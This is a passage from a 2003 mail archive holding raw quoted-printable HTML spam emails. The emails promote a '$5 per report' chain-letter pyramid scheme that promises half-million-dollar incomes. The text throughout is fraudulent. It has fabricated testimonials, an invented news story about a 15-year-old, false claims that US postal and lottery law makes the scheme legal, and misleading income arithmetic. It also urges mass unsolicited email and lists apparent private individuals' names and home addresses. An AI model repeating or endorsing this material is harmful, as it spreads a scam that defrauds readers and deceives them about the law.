port#
2, YOU CAN RELAX, because the system is already working for you, and the
cash will continue to roll in! THIS IS IMPORTANT TO REMEMBER: Every time
your name is moved down on the list, you are placed in front of a Differen=
t
report.</font>
<p><font face=3D"Arial">You can KEEP TRACK of your PROGRESS by watching wh=
ich
report people are ordering from you. IF YOU WANT TO GENERATE MORE INCOME
SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN. There
is NO LIMIT to the income you can generate from this business!!!</font></b=
lockquote>
</blockquote>

<center><b><font face=3D"Arial">FOLLOWING IS A NOTE FROM THE ORIGINATOR OF=

THIS PROGRAM:</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You have just received information that
can give you financial freedom for the rest of your life, with NO RISK
and JUST A LITTLE BIT OF EFFORT. You can make more money in the next few
weeks and months than you have ever imagined. Follow the program EXACTLY
AS INSTRUCTED. Do not change it in any way. It works exceedingly well as
it is now. Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others to #2...#
5 as instructed above. One of the people you send this to may send out
100,000 or more e-mails and your name will be on every one of them. (Just
to let you know anyone who sends money to Cole Schulte (me) I send out
least 5 million a month, there are bulk emails companies you can hire and
they do all the work for you...) Remember though, the more you send out
the more potential customers you will reach. So my friend, I have given
you the ideas, information, materials and opportunity to become financiall=
y
independent. IT IS UP TO YOU NOW!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">MORE TESTIMONIALS</font></b></center>

<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"My name is Mi=
tchell.
My wife, Jody and I live in Chicago. I am an accountant with a major U.S.C=
orporation
and I make pretty good money. When I received this program I grumbled to
Jody about receiving 'junk mail'. I made fun of the whole thing, spouting
my knowledge of the population and percentages involved. I 'knew' it would=
n't
work. Jody totally ignored my supposed intelligence and few days later
she jumped in with both feet. I made merciless fun of her, and was ready
to lay the old 'I told you so' on her when the thing didn't work. Well,
the laugh was on me! Within 3 weeks she had received 50 responses. Within
the next 45 days she had received total $ 147,200.00 ........ all cash!
I was shocked. I have joined Jody in her 'hobby'."</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Mitchell Wolf M.D.,<=
/font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Chicago, Illinois</=
font></font></i></b></blockquote>
</blockquote>

<center>
<hr width=3D"85%"></center>

<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"Not being the=

gambling type, it took me several weeks to make up my mind to participate
in this plan. But conservative as I am, I decided that the initial investm=
ent
was so little that there was just no way that I wouldn't get enough orders=

to at least get my money back. I was surprised when I found my medium size=

post office box crammed with orders. I made $319,210.00 in the first 12
weeks. The nice thing about this deal is that it does not matter where
people live. There simply isn't a better investment with a faster return
and so big".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Dan Sondstrom,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Alberta, Canada</fo=
nt></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"I had receive=
d
this program before. I deleted it, but later I wondered if I should have
given it a try. Of course, I had no idea who to contact to get another
copy, so I had to wait until I was e-mailed again by someone else........1=
1
months passed then it luckily came again...... I did not delete this one!
I made more than $490,000 on my first try and all the money came within
22 weeks".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Susan De Suza,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">New York, N.Y.</fon=
t></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"It really is =
a
great opportunity to make relatively easy money with little cost to you.
I followed the simple instructions carefully and within 10 days the money
started to come in. My first month I made $ 20,560.00 and by the end of
third month my total cash count was $ 362,840.00. Life is beautiful, Thanx=

to the internet".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Fred Dellaca,</font>=
</font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Westport, New Zeala=
nd</font></font></i></b></blockquote>

<hr width=3D"85%"></blockquote>

<center><b><font face=3D"Arial"><font size=3D+0>ORDER YOUR REPORTS TODAY, =
GET
STARTED ON YOUR ROAD TO</font></font></b>
<p><b><font face=3D"Arial"><font size=3D+2>FINANCIAL FREEDOM!</font></font=
></b></center>
</blockquote>

<center><i><font face=3D"Arial"><font size=3D-1>If you have any questions =
as
to the legality of this program, contact the Office of</font></font></i>
<br><i><font face=3D"Arial"><font size=3D-1>Associate Director for Marketi=
ng
Practices, Bureau of Consumer Protection, Washington, D.C</font>.</font></=
i>
<p>&nbsp;</center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>This =
message
is sent in compliance of the proposed bill SECTION 301, paragraph (a)(2)(C=
)
of S. 1618.</font></font></font>
<br><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>to be rem=
oved
from this mailing, please utilize our <a href=3D"http://203.95.1.160/remov=
e.html">remove
link here</a></font></font></font></center>

<div class=3D"ItalicBold"></div>

</body>
</html>
nz y fnvpxfaswjtfhqxwglzi d

--.C7._13.0D__.AD3EE.A..--


From 7ezbtwef@webdata.com.au Fri Aug 22 07:52:39 2003
Return-Path: <7ezbtwef@webdata.com.au>
Received: from alb-24-194-1-37.nycap.rr.com (alb-24-194-1-37.nycap.rr.com [24.194.1.37])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h7MBqb8b017064
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 22 Aug 2003 07:52:37 -0400 (EDT)
Received: from [66.56.12.250] by alb-24-194-1-37.nycap.rr.com with ESMTP id B130EE9CE7B; Fri, 22 Aug 2003 05:47:24 +0500
Message-ID: <70----9n3$oq$hdl@p4ggy77a>
From: "Opal Conley" <7ezbtwef@webdata.com.au>
Reply-To: "Opal Conley" <7ezbtwef@webdata.com.au>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: FINANCIAL FREEDOM! uzgqsjwmnfn 
Date: Fri, 22 Aug 03 05:47:24 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".BA_27.A25"
X-Priority: 3
X-MSMail-Priority: Normal


--.BA_27.A25
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>P01</title>
</head>
<body text=3D"#000000" bgcolor=3D"#009900" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
&nbsp;
<center><table CELLSPACING=3D0 WIDTH=3D"690" BGCOLOR=3D"#FFFFFF" class=3D"=
center" >
<tr>
<td class=3D"backImg">&nbsp;
<center>
<br><b><font face=3D"Arial">DO NOT DELETE THIS - <u>READ FIRST</u> - IT WI=
LL
CHANGE YOUR LIFE!</font></b>
<p><font face=3D"Arial"><font size=3D+2>This <b>Really Works</b>!</font></=
font>
<p><b><u><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>Give=
 Your
Future Five Minutes And Read This Email</font></font></font></u></b>
<p><b><u><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>It W=
ill
Change Your Life!</font></font></font></u></b>
<p><b><i><font face=3D"Arial">A One Time Investment Of $25 Plus This Simpl=
e
Technology</font></i></b>
<br><b><i><font face=3D"Arial">Could Make You Financially Secure For Life!=
</font></i></b></center>

<blockquote>
<center><font face=3D"Arial">Just Because <b>This&nbsp; Is Easy</b> doesn'=
t
mean it's not <b>Honest</b>, or <b>Real Business</b>.&nbsp; Keep&nbsp;</fo=
nt>
<br><font face=3D"Arial"><b>Working Hard</b> or Learn to <b>Work Smart</b>=
.
What do you think Successful People Do?</font></center>

<blockquote><font face=3D"Arial">This is a completely documented method to=

Get Wealthy and Anyone regardless of Age, Race, State of Health, Country
of origin, or Financial Standing can participate. No Education or Special
Experience is needed. Within the next two weeks you could be well on your
way to a $500,000.00 income. Imagine being able to make over a half millio=
n
dollars every 4 to 5 months from your home.</font></blockquote>

<center><b><font face=3D"Arial">THANK'S TO THE COMPUTER AGE AND THE INTERN=
ET</font></b>
<p><b><font face=3D"Arial"><font size=3D+1>AS SEEN ON NATIONAL TV:</font><=
/font></b></center>

<center><b><font face=3D"Arial">PARENTS OF 15 - YEAR OLD - FIND $71,000 CA=
SH
HIDDEN IN HIS CLOSET!</font></b></center>

<blockquote><font face=3D"Arial">Does this headline look familiar? Of cour=
se
it does. You most likely have just seen this story recently featured on
a major nightly news program (USA). And reported elsewhere in the world.
His mother was cleaning and putting laundry away when she came across a
large brown paper bag that was suspiciously buried beneath some clothes
and a skateboard in the back of her 15-year-old sons closet. Nothing could=

have prepared her for the shock she got when she opened the bag and found
it was full of cash. Five-Dollar Bills, Twenties, Fifties and Hundreds
- all neatly rubber-banded in labelled piles.</font>
<p><font face=3D"Arial">"My first thought was that he had robbed a bank",
says the 41-year-old woman, "There was over $71,000 Dollars in that bag
-- that's more than my husband earns in a year".</font>
<p><font face=3D"Arial">The woman immediately called her husband at the ca=
r-dealership
where he worked to tell him what she had discovered. He came home right
away, and they drove together to the boys school, and picked him up. Littl=
e
did they suspect that where the money came from, was more shocking than
actually finding it in the closet.</font>
<p><font face=3D"Arial">As it turns out, the boy had been sending out, via=

E-mail, a type of "Report" to E-mail addresses that he obtained off the
Internet. Everyday after school for the past 2 months, he had been doing
this right on his computer in his bedroom.</font>
<p><font face=3D"Arial">"I just got the E-mail one day and I figured what
the heck, I put my name on it like the instructions said and I started
sending it out", says the clever 15-year-old.</font>
<p><font face=3D"Arial">The E-mail letter listed 5 addresses and contained=

instructions to send one $5 dollar bill to each person on the list, then
delete the address at the bottom and move the others addresses Down , and
finally to add your name to the top of the list.</font>
<p><font face=3D"Arial">The letter goes on to state that you would receive=

Several Thousand Dollars in Five-Dollar Bills within 2 weeks if you sent
out the letter with your name at the top of the 5-address list. "I get
junk E-mail all the time, and really did not think it was going to work",
the boy continues.</font>
<p><font face=3D"Arial">Within the first few days of sending out the E-mai=
l,
the Post Office Box that his parents had gotten him for his video-game
magazine subscriptions began to fill up with not with magazines, but envel=
opes
containing $5 Bills.</font>
<p><font face=3D"Arial">"About a week later I rode [my bike] down to the
post office and my box had 1 magazine and about 300 envelops stuffed in
it. There was also a yellow slip that said I had to go up to the [post
office] counter. I thought I was in trouble or something (laughs)". He
goes on, "I went up to the counter and they had a whole box of more mail
for me. I had to ride back home and empty out my backpack because I could
not carry it all". Over the next few weeks, the boy continued sending out
the E-mail."The money just kept coming in and I just kept sorting it and
stashing it in the closet, barely had time for my homework".He had also
been riding his bike to several of the banks in his area and exchanging
the $5 bills for twenties, fifties and hundreds.</font>
<p><font face=3D"Arial">"I didn't want the banks to get suspicious so I ke=
pt
riding to different banks with like five thousand at a time in my backpack=
.
I would usually tell the lady at the bank counter that my dad had sent
me in to exchange the money and he was outside waiting for me.One time
the lady gave me a really strange look and told me that she would not be
able to do it for me and my dad would have to come in and do it, but I
just rode to the next bank down the street (laughs)." Surprisingly, the
boy did not have any reason to be afraid.The reporting news team examined
and investigated the so-called "chain-letter" the boy was sending out and
found that it was not a chain-letter at all.In fact, it was completely
legal according to US Postal and Lottery Laws, Title 18, Section 1302 and
1341, or Title 18, Section 3005 in the US code, also in the code of federa=
l
regulations, Volume 16, Sections 255 and 436, which state a product or
service must be exchanged for money received.</font>
<p><font face=3D"Arial">Every five-dollar bill that he received contained
a little note that read, "Please send me report number XYX".This simple
note made the letter legal because he was exchanging a service (A Report
on how-to) for a five-dollar fee.</font>
<p><font face=3D"Arial">[This is the end of the media release. If you woul=
d
like to understand how the system works and get your $71,000 plus - please=

continue reading. What appears below is what the 15 year old was sending
out on the net - YOU CAN USE IT TOO - just follow the simple instructions]=
</font>
<br>&nbsp;
<br>&nbsp;
<p><b><font face=3D"Arial">BE AN INTERNET MILLIONAIRE LIKE OTHERS&nbsp; WI=
THIN
A YEAR!!!</font></b>
<p><font face=3D"Arial"><b>Before you say ''Bull'', please read the follow=
ing.</b>
This is the letter you have been hearing about on the news lately. Due
to the popularity of this letter on the Internet, a national weekly news
program recently devoted an entire show to the investigation of this progr=
am
described below, to see if it really can make people money. The show also
investigated whether or not the program was legal.</font>
<p><font face=3D"Arial">Their findings proved once and for all that there
are ''absolutely NO Laws prohibiting the participation in the program and
if people can "follow the simple instruction" they are bound to make some
mega bucks with only $25 out of pocket cost''.</font>
<p><font face=3D"Arial">DUE TO THE RECENT INCREASE OF POPULARITY &amp; RES=
PECT
THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING BETTER THAN EVER.</font=
>
<p><font face=3D"Arial">This is what one had to say:&nbsp;</font>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">''Thanks to th=
is
profitable opportunity". I was approached many times before but each time
I passed on it. I am so glad I finally joined just to see what one could
expect in return for the minimal effort and money required. To my astonish=
ment,
I received a total $ 610,470.00 in 21 weeks, with money still coming in''.=
</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>Pam =
Hedland</font></font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>For=
t Lee,
New Jersey.</font></font></font></i></b></blockquote>
</blockquote>

<hr width=3D"600" noshade>
<blockquote><font face=3D"Arial">Another said:</font>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"This program =
has
been around for a long time but I never believed in it. But one day when
I received this again in the mail I decided to gamble my $25 on it. I foll=
owed
the simple instructions and Wa-laa ..... 3 weeks later the money started
to come in. First month I only made $240.00 but the next 2 months after
that I made a total of $290,000.00. So far, in the past 8 months by re-ent=
ering
the program, I have made over $710,000.00 and I am playing it again. The
key to success in this program is to follow the simple steps and NOT chang=
e
anything."</font></font></i></blockquote>

<p><br><font face=3D"Arial">More testimonials later but first...</font></b=
lockquote>
</blockquote>

<center>
<p><b><font face=3D"Arial">PRINT THIS NOW FOR YOUR FUTURE REFERENCE</font>=
</b></center>

<p>
<hr width=3D"85%">
<center><b><font face=3D"Arial"><font color=3D"#FF0000">If you would like =
to
make at least $500,000 every 4 to 5 months easily and</font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000">comfortably, please re=
ad
the following...THEN READ IT AGAIN and AGAIN !!!</font></font></b></center=
>

<hr width=3D"85%">
<center>
<p><b><font face=3D"Arial">FOLLOW THE SIMPLE INSTRUCTIONS BELOW&nbsp;</fon=
t></b>
<br><b><font face=3D"Arial">AND YOUR FINANCIAL DREAMS WILL COME TRUE!</fon=
t></b></center>

<blockquote>
<blockquote><b><i><u><font face=3D"Arial">INSTRUCTIONS:</font></u></i></b>=

<p><font face=3D"Arial"><font size=3D-1>For each report, send $5 CASH, THE=

NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS
to the person whose name appears ON THAT LIST next to the report. MAKE
SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of
any mail problems</font>.</font></blockquote>
</blockquote>

<center>
<p><br><b><font face=3D"Arial">WHEN YOU PLACE YOUR ORDER,&nbsp;</font></b>=

<br><b><font face=3D"Arial">MAKE SURE YOU ORDER EACH OF THE 5 REPORTS!&nbs=
p;</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You will need all 5 reports so that you
can save them on your computer and resell them.</font>
<center>
<p><b><font face=3D"Arial">YOUR TOTAL COST $5 X 5 =3D $25.00</font></b>
<br><font face=3D"Arial">(That's what I spend every time I take my girlfri=
end
to the movies)</font></center>

<p><font face=3D"Arial">Within a few days <b>you will receive, via e-mail,=

each of the 5 reports from these 5 different individuals.</b> Save them
on your computer so they will be accessible for you to send to the 1,000's=

of people who will order them from you. Also make a floppy of these report=
s
and keep it in your desk in case something happens to your computer.</font=
>
<br>&nbsp;
<p><b><font face=3D"Arial">IMPORTANT:</font></b>
<p><font face=3D"Arial"><b>DO NOT</b> alter the names of the people who ar=
e
listed next to each report, or their sequence on the list, in any way othe=
r
than what is instructed below in step '' 1 through 6 '' or you will loose
out on the majority of your profits. Once you understand the way this work=
s,
you will also see how it does not work if you change it. Remember, this
method has been tested, and <b>if you alter it, it will NOT work !!!</b>
People have tried to put their friends/relatives names on all five thinkin=
g
they could get all the money. But it does not work this way. Believe us,
some have tried to be greedy and then nothing happened. So Do Not try to
change anything other than what is instructed. Because if you do, it will
not work for you. Remember, <b><u>Honesty Reaps The Reward!!!&nbsp;</u></b=
></font></blockquote>

<center><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font
size=3D=
+1>This
IS a legitimate BUSINESS. You are offering&nbsp;</font></font></font></u><=
/i></b>
<br><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font size=3D+1>=
a product
for sale and getting paid for it.&nbsp;</font></font></font></u></i></b>
<p><b><i><font face=3D"Arial"><font color=3D"#CC0000">Treat it as such and=

you will be VERY profitable in a short period of time</font></font></i></b=
></center>
</blockquote>

<blockquote>
<blockquote><font face=3D"Arial">After you have ordered all 5 reports, tak=
e
this advertisement and REMOVE the name &amp; address of the person in REPO=
RT
# 5. This person has made it through the cycle and is no doubt counting
their fortune. Email them and ask that's what I always did.</font><font fa=
ce=3D"Arial">Move
the name &amp; address in REPORT # 4 down TO REPORT # 5.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 3 down TO REPORT # 4.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 2 down TO REPORT # 3.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 1 down TO REPORT # 2</font><font
face=3D=
"Arial">Insert
YOUR name &amp; address in the REPORT # 1 Position.</font></blockquote>

<center>
<p><br><font face=3D"Arial"><b>PLEASE MAKE SURE</b> you copy every name &a=
mp;
address <b>ACCURATELY</b></font>
<br><font face=3D"Arial">(Just cut and paste! This is critical to <b>YOUR
</b>success.</font></center>
</blockquote>

<center><font face=3D"Arial">Take this entire letter, with the modified li=
st
of names, and save it on your computer.</font>
<p><b><font face=3D"Arial">DO NOT MAKE ANY OTHER CHANGES</font></b></cente=
r>

<blockquote>
<blockquote><font face=3D"Arial"><b>Save this on a disk as well just in ca=
se
if you loose any data</b>. To assist you with marketing your business on
the internet, the 5 reports you purchase will provide you with invaluable
marketing information which includes how to send bulk e-mails legally,
where to find thousands of free classified ads and much more. There are
2 Primary methods to get this venture going:</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">METHOD # 1: BY SENDING BULK E-MAIL LEGALLY=
</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">Let's say that you decide to start small,=

just to see how it goes, and we will assume You and those involved send
out only 5,000 e-mails each. Let's also assume</font>
<p><font face=3D"Arial">that the mailing receives only a 0.2% (2/10 of 1=
%)
response (the response could be much better but lets just say it is only
0.2%). Also many people will send out hundreds of thousands e-mails instea=
d
of only 5,000 each). Continuing with this example, you send out only 5,000=

e-mails.</font>
<p><font face=3D"Arial">With a 0.2% response, that is only 10 orders for
report # 1. Those 10 people responded by sending out 5,000 e-mail each
for a total of 50,000. Out of those 50,000 e-mails only 0.2% responded
with orders. That's=3D100 people responded and ordered Report # 2.</font>
<p><font face=3D"Arial">Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to that is 1000 orders for
Report # 3.</font>
<p><font face=3D"Arial">Those 1000 people send 5,000 e-mail each for a tot=
al
of 5 million e-mail sent out. The 0.2% response is 10,000 orders for Repor=
t
# 4.</font>
<p><font face=3D"Arial">Those 10,000 people send out 5,000 e-mails each fo=
r
a total of 50,000,000 (50 million) e-mails. The 0.2% response to that is
100,000 orders for Report # 5.</font>
<p><font face=3D"Arial">THAT'S 100,000 ORDERS TIMES $5 EACH =3D $500,000.0=
0
(half a million dollars).</font>
<p><font face=3D"Arial">Your total income in this example is: 1... $50 +
2..... $500 + 3..... $5,000 + 4..... $50,000 + 5....$500,000 .... Grand
Total=3D$555,550.00</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+1>NU=
MBERS
DO NOT LIE</font></font></font></b></center>

<blockquote>
<blockquote><b><font face=3D"Arial"><font color=3D"#000000"><font size=3D-=
1>GET
A PENCIL &amp; PAPER AND FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO
MATTER HOW YOU CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY! (I did
it was $55,000 in four months)</font></font></font></b>
<p><font face=3D"Arial">REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING=

OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would happen
if everyone or half or even one 4th of those people mailed 100,000 e-mails=

each or more? There are 580.78 million people on the Internet worldwide
and counting, with thousands of more coming on line every day.&nbsp;</font=
>
<p><font face=3D"Arial">Believe me, there isn't any better way to make mon=
ey!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">METHOD # 2: BY PLACING FREE ADS ON THE INT=
ERNET</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">Advertising on the net is very, very inex=
pensive
and there are hundreds of FREE places to advertise. Placing a lot of free
ads on the Internet will easily get a larger response. We strongly suggest=

you start with Method # 1 and add METHOD #2 as you go along. For every
$5 you receive, all you must do is e-mail them the Report they ordered.
That's it. Always provide same day service on all orders.</font>
<p><font face=3D"Arial">This will guarantee that the e-mail they send out,=

with your name and address on it, will be prompt because they can not adve=
rtise
until they receive the report.</font>
<p><font face=3D"Arial">The reason for the "cash" is not because this is
illegal or somehow "wrong". It is simply about time. Time for checks or
credit cards to be cleared or approved, etc. Concealing it is simply so
no one can SEE there is money in the envelope and steal it before it gets
to you.</font></blockquote>

<center><font face=3D"Arial"><b>ORDER EACH REPORT BY ITS NUMBER &amp; NAME=

ONLY</b>.</font></center>

<blockquote><b><font face=3D"Arial">Notes:</font></b>
<p><font face=3D"Arial">Always send $5 cash (U.S. CURRENCY) for each Repor=
t.
Checks NOT accepted. Make sure the cash is concealed by wrapping it in
at least 2 sheets of paper or foil will also work. On one of those sheets
of paper, write the NUMBER &amp; the NAME of the Report you are ordering,
YOUR E-MAIL ADDRESS and your name and postal address.</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font size=3D+1>AVAILABLE REPORTS</font></=
font></b>
<br><b><font face=3D"Arial">PLACE YOUR ORDER FOR THESE REPORTS NOW:</font>=
</b></center>

<br>&nbsp;
<center><table WIDTH=3D"80%" class=3D"center" >
<tr>
<td WIDTH=3D"30%" BGCOLOR=3D"#009900" class=3D"left">&nbsp;</td>

<td>
<br><b><font face=3D"Arial">REPORT #1:&nbsp;</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Advertisi=
ng
For Free On The Net"&nbsp;</font></font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Order Report #1 From=
:</font></font></b>
<blockquote><b><font face=3D"Arial,Helvetica"><font size=3D-1>Jozsef Riczu=
</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>15 Forty First Stree=
t</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Etobicoke,Ontario M8=
W 3N4</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Canada</font></font>=
</b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #2:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Sending B=
ulk
E-mail On The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #2 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>Ron Florom</font></fon=
t></b>
<br><b><font face=3D"Arial"><font size=3D-1>705 Sherman</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Holdrege, NE 68949</font></fon=
t></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #3:</font></b>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>"Secret T=
o Multilevel
Marketing On The Net"</font></font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #3 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>A.P.J. Gouveia</font><=
/font></b>
<br><b><font face=3D"Arial"><font size=3D-1>53 Stuart Road</font></font></=
b>
<br><b><font face=3D"Arial"><font size=3D-1>South Plympton, SA 5030</font>=
</font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Australia</font></font></b></b=
lockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #4:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Become A Millionaire Util=
izing
MLM &amp; The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #4 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>L. Savage</font></font=
></b>
<br><b><font face=3D"Arial"><font size=3D-1>Rt. 2 Box 4501</font></font></=
b>
<br><b><font face=3D"Arial"><font size=3D-1>Cameron, OK 74932</font></font=
></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #5:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Safely Send 1 Million Ema=
ils
For Virtually No Money"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #5 From:&nbsp;</f=
ont></font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>Tressa Giles</font></f=
ont></b>
<br><b><font face=3D"Arial"><font size=3D-1>2150 Millcreek Rd</font></font=
></b>
<br><b><font face=3D"Arial"><font size=3D-1>Mansfield, PA 16933</font></fo=
nt></b></blockquote>
</td>
</tr>
</table></center>

<blockquote>
<blockquote>
<center><b><font face=3D"Arial"><font size=3D+0>There are currently more t=
han
570,000,000 people online worldwide!</font></font></b></center>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>$$=
$$$$$
YOUR SUCCESS GUIDELINES $$$$$$$</font></font></font></b></center>

<blockquote><font face=3D"Arial">Follow these guidelines to guarantee your=

success:</font>
<p><font face=3D"Arial">If you do not receive at least 10 orders for Repor=
t
#1 within 2 weeks, continue sending e-mails until you do.</font>
<p><font face=3D"Arial">After you have received 10 orders, 2 to 3 weeks af=
ter
that you should receive 100 orders or more for REPORT # 2. If you did not,=

continue advertising or sending e-mails until you do.</font>
<p><font face=3D"Arial">**Once you have received 100 or more orders for Re=
port#
2, YOU CAN RELAX, because the system is already working for you, and the
cash will continue to roll in! THIS IS IMPORTANT TO REMEMBER: Every time
your name is moved down on the list, you are placed in front of a Differen=
t
report.</font>
<p><font face=3D"Arial">You can KEEP TRACK of your PROGRESS by watching wh=
ich
report people are ordering from you. IF YOU WANT TO GENERATE MORE INCOME
SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN. There
is NO LIMIT to the income you can generate from this business!!!</font></b=
lockquote>
</blockquote>

<center><b><font face=3D"Arial">FOLLOWING IS A NOTE FROM THE ORIGINATOR OF=

THIS PROGRAM:</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You have just received information that
can give you financial freedom for the rest of your life, with NO RISK
and JUST A LITTLE BIT OF EFFORT. You can make more money in the next few
weeks and months than you have ever imagined. Follow the program EXACTLY
AS INSTRUCTED. Do not change it in any way. It works exceedingly well as
it is now. Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others to #2...#
5 as instructed above. One of the people you send this to may send out
100,000 or more e-mails and your name will be on every one of them. (Just
to let you know anyone who sends money to Cole Schulte (me) I send out
least 5 million a month, there are bulk emails companies you can hire and
they do all the work for you...) Remember though, the more you send out
the more potential customers you will reach. So my friend, I have given
you the ideas, information, materials and opportunity to become financiall=
y
independent. IT IS UP TO YOU NOW!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">MORE TESTIMONIALS</font></b></center>

<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"My name is Mi=
tchell.
My wife, Jody and I live in Chicago. I am an accountant with a major U.S.C=
orporation
and I make pretty good money. When I received this program I grumbled to
Jody about receiving 'junk mail'. I made fun of the whole thing, spouting
my knowledge of the population and percentages involved. I 'knew' it would=
n't
work. Jody totally ignored my supposed intelligence and few days later
she jumped in with both feet. I made merciless fun of her, and was ready
to lay the old 'I told you so' on her when the thing didn't work. Well,
the laugh was on me! Within 3 weeks she had received 50 responses. Within
the next 45 days she had received total $ 147,200.00 ........ all cash!
I was shocked. I have joined Jody in her 'hobby'."</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Mitchell Wolf M.D.,<=
/font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Chicago, Illinois</=
font></font></i></b></blockquote>
</blockquote>

<center>
<hr width=3D"85%"></center>

<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"Not being the=

gambling type, it took me several weeks to make up my mind to participate
in this plan. But conservative as I am, I decided that the initial investm=
ent
was so little that there was just no way that I wouldn't get enough orders=

to at least get my money back. I was surprised when I found my medium size=

post office box crammed with orders. I made $319,210.00 in the first 12
weeks. The nice thing about this deal is that it does not matter where
people live. There simply isn't a better investment with a faster return
and so big".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Dan Sondstrom,</font=
></font></i></b>
